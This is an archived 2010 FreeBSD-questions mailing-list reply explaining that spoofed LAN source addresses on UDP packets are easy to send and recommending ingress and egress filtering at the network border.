From owner-freebsd-questions@FreeBSD.ORG Sun Oct 17 17:20:30 2010 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 490AA106564A for ; Sun, 17 Oct 2010 17:20:30 +0000 (UTC) (envelope-from bonomi@mail.r-bonomi.com) Received: from mail.r-bonomi.com (ns2.r-bonomi.com [204.87.227.129]) by mx1.freebsd.org (Postfix) with ESMTP id 1BDF38FC1C for ; Sun, 17 Oct 2010 17:20:29 +0000 (UTC) Received: (from bonomi@localhost) by mail.r-bonomi.com (8.14.3/rdb1) id o9HHISJq003050; Sun, 17 Oct 2010 12:18:28 -0500 (CDT) Date: Sun, 17 Oct 2010 12:18:28 -0500 (CDT) From: Robert Bonomi Message-ID: <201010171718.o9HHISJq003050@mail.r-bonomi.com> To: freebsd-questions@freebsd.org, nlandys@gmail.com Cc: Subject: Re: UDP packet spoofed LAN source address? X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 17 Oct 2010 17:20:30 -0000 > From owner-freebsd-questions@freebsd.org Sun Oct 17 00:26:19 2010 > Date: Sat, 16 Oct 2010 21:56:52 -0700 > From: Nerius Landys > To: FreeBSD Mailing List > Subject: UDP packet spoofed LAN source address? > > This is really more of a networking question. > I'm wondering, in a typical scenario, for example my server is in a data > center with a typical colocation company. > > I am editing someone else's code, and this code handles incoming UDP > packets. The code handles UDP packets that have a source address being from > the LAN differently. It gives those packets special treatment. To check > whether a source address is a LAN address, it does the typical checks for > 10.0.0.0, 172.16.0.0, 192.168.0.0, 127.0.0.0, and it also checks every > assinged IP address with netmask to see if the source address on the UDP > packet came from that network. > > My question is - how possible (in these typical environments) is it to send > a UDP packet from far away that claims to have a source address being a LAN > address? *VERY* possible. in fact -trivially- easy. Note: its trivial to do with TCP packets as well. however those are usually less worrisime because the connection set-up 'handshake' fails. > Will such a packet typically make it to my server, or will a > router along the way stop it from arriving? Almost invariably, it -will- reach your network, *unless8 YOU do 'ingess filtering' at your border to block it. Doing such ingress filtering is a GOOD IDEA(tm), Also strongly recommended: 'egress filtering' to trap anything that tries to exit with an RFC-1918 source address, or a source address that is -not- part of your assined netblock. to your netork. > Maybe, is there a simple 10 line C program that I can run and compile to > check if this scenario is possible on _my_ server? 'netcat' has the capability built in.